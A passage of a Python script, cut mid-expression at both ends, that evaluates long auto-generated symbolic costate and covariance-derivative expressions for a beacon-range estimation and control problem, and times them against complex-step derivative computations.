- yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s - lamP22_N*(p12_n*p12_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p12_n*p12_s*(x_n*x_s - xb)*(-p12_n*p12_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p22_n*p22_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p22_n*p22_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p22_n*p22_s*y_s*(y_n*y_s - yb)**2*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p22_n*p22_s*y_s*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(-p12_n*p12_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p22_n*p22_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p22_n*p22_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s - lamP23_N*(p13_n*p13_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p13_n*p13_s*(x_n*x_s - xb)*(-p12_n*p12_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p22_n*p22_s*y_s*(y_n*y_s - 
yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p22_n*p22_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p23_n*p23_s*y_s*(y_n*y_s - yb)**2*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p23_n*p23_s*y_s*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(-p12_n*p12_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p22_n*p22_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p22_n*p22_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s - lamP33_N*(p13_n*p13_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p13_n*p13_s*(x_n*x_s - xb)*(-p13_n*p13_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p13_n*p13_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p13_n*p13_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p23_n*p23_s*y_s*(y_n*y_s - yb)**2*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p23_n*p23_s*y_s*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - 
xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(-p13_n*p13_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p13_n*p13_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p13_n*p13_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p33_s),
(tf)*(-lamP11_N*(-2*Dt*sigv**2*theta_s*sin(theta_n*theta_s)*cos(theta_n*theta_s) - 2*p13_n*p13_s*theta_s*v*cos(theta_n*theta_s))/p11_s - lamP12_N*(-Dt*sigv**2*theta_s*sin(theta_n*theta_s)**2 + Dt*sigv**2*theta_s*cos(theta_n*theta_s)**2 - p13_n*p13_s*theta_s*v*sin(theta_n*theta_s) - p13_n*p13_s*theta_s*v*cos(theta_n*theta_s))/p12_s + lamP13_N*p33_n*p33_s*theta_s*v*cos(theta_n*theta_s)/p13_s - lamP22_N*(2*Dt*sigv**2*theta_s*sin(theta_n*theta_s)*cos(theta_n*theta_s) - p13_n*p13_s*theta_s*v*sin(theta_n*theta_s) - p23_n*p23_s*theta_s*v*sin(theta_n*theta_s))/p22_s + lamP23_N*p33_n*p33_s*theta_s*v*sin(theta_n*theta_s)/p23_s + lamX_N*theta_s*v*sin(theta_n*theta_s)/x_s - lamY_N*theta_s*v*cos(theta_n*theta_s)/y_s),
(tf)*(-lamP11_N*(-p11_n*p11_s**2*(x_n*x_s - xb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p11_s*p12_n*p12_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p11_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s - lamP12_N*(-p11_s*p12_n*p12_s*(x_n*x_s - xb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p11_s*p22_n*p22_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s - lamP13_N*(-p11_s*p13_n*p13_s*(x_n*x_s - xb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p11_s*p23_n*p23_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s),
(tf)*(-lamP11_N*(-p11_n*p11_s*p12_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s**2*(y_n*y_s - yb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s - lamP12_N*(-p12_n*p12_s**2*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*p22_n*p22_s*(y_n*y_s - yb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s - lamP13_N*(-p12_s*p13_n*p13_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*p23_n*p23_s*(y_n*y_s - yb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s - lamP22_N*(-p12_n*p12_s**2*(x_n*x_s - xb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*p22_n*p22_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s - lamP23_N*(-p12_s*p13_n*p13_s*(x_n*x_s - xb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*p23_n*p23_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s),
(tf)*(2*lamP11_N*p13_s*v*sin(theta_n*theta_s)/p11_s - lamP12_N*(-p13_s*v*sin(theta_n*theta_s) + p13_s*v*cos(theta_n*theta_s))/p12_s - lamP22_N*p13_s*v*cos(theta_n*theta_s)/p22_s - lamP33_N*(-p13_n*p13_s*(x_n*x_s - xb)*(p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p13_s*(x_n*x_s - xb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p33_s + lamP13_N*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + lamP23_N*p13_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*p23_s*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))),
(tf)*(-lamP22_N*(-p12_n*p12_s*p22_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s**2*(y_n*y_s - yb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s - lamP23_N*(-p13_n*p13_s*p22_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_s*p23_n*p23_s*(y_n*y_s - yb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s + lamP12_N*p22_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*p12_s*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))),
(tf)*(-lamP22_N*p23_s*v*cos(theta_n*theta_s)/p22_s + lamP13_N*p23_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*p13_s*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + lamP23_N*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + lamP33_N*p23_s*(y_n*y_s - yb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*p33_s*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))),
(tf)*(lamP13_N*p33_s*v*sin(theta_n*theta_s)/p13_s - lamP23_N*p33_s*v*cos(theta_n*theta_s)/p23_s),
tf*0,
])
print(fx)
tock = toc()
print('A:' + str(tock))
tic()
for i in range(1000):
gx = np.array([
(tf)*(-np.imag(lamP11_N*(Dt*sigv**2*cos(theta_n*theta_s)**2 - 2*p13_n*p13_s*v*sin(theta_n*theta_s) - p11_n*p11_s*(x_s*(1.0e-50*1j + x_n) - xb)*(p11_n*p11_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)))/p11_s + lamP12_N*(Dt*sigv**2*sin(theta_n*theta_s)*cos(theta_n*theta_s) - p13_n*p13_s*v*sin(theta_n*theta_s) + p13_n*p13_s*v*cos(theta_n*theta_s) - p12_n*p12_s*(x_s*(1.0e-50*1j + x_n) - xb)*(p11_n*p11_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)))/p12_s + lamP13_N*(-p33_n*p33_s*v*sin(theta_n*theta_s) - p13_n*p13_s*(x_s*(1.0e-50*1j + x_n) - xb)*(p11_n*p11_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - 
xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)))/p13_s + lamP22_N*(Dt*sigv**2*sin(theta_n*theta_s)**2 + p13_n*p13_s*v*cos(theta_n*theta_s) + p23_n*p23_s*v*cos(theta_n*theta_s) - p12_n*p12_s*(x_s*(1.0e-50*1j + x_n) - xb)*(p12_n*p12_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)))/p22_s + lamP23_N*(p33_n*p33_s*v*cos(theta_n*theta_s) - p13_n*p13_s*(x_s*(1.0e-50*1j + x_n) - xb)*(p12_n*p12_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)))/p23_s + lamP33_N*(Dt*sigw**2 - p13_n*p13_s*(x_s*(1.0e-50*1j + x_n) - xb)*(p13_n*p13_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p13_n*p13_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j 
+ x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)))/p33_s)/1e-50),
(tf)*(-np.imag(lamP11_N*(Dt*sigv**2*cos(theta_n*theta_s)**2 - 2*p13_n*p13_s*v*sin(theta_n*theta_s) - p11_n*p11_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p12_n*p12_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)) - p12_n*p12_s*(y_s*(1.0e-50*1j + y_n) - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p12_n*p12_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)))/p11_s + lamP12_N*(Dt*sigv**2*sin(theta_n*theta_s)*cos(theta_n*theta_s) - p13_n*p13_s*v*sin(theta_n*theta_s) + p13_n*p13_s*v*cos(theta_n*theta_s) - p12_n*p12_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p12_n*p12_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)) - p22_n*p22_s*(y_s*(1.0e-50*1j + y_n) - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p12_n*p12_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)))/p12_s + lamP13_N*(-p33_n*p33_s*v*sin(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p12_n*p12_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)) - p23_n*p23_s*(y_s*(1.0e-50*1j + y_n) - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p12_n*p12_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + 
(y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)))/p13_s + lamP22_N*(Dt*sigv**2*sin(theta_n*theta_s)**2 + p13_n*p13_s*v*cos(theta_n*theta_s) + p23_n*p23_s*v*cos(theta_n*theta_s) - p12_n*p12_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p22_n*p22_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)) - p22_n*p22_s*(y_s*(1.0e-50*1j + y_n) - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p22_n*p22_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)))/p22_s + lamP23_N*(p33_n*p33_s*v*cos(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p22_n*p22_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)) - p23_n*p23_s*(y_s*(1.0e-50*1j + y_n) - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p22_n*p22_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)))/p23_s + lamP33_N*(Dt*sigw**2 - p13_n*p13_s*(x_n*x_s - xb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + 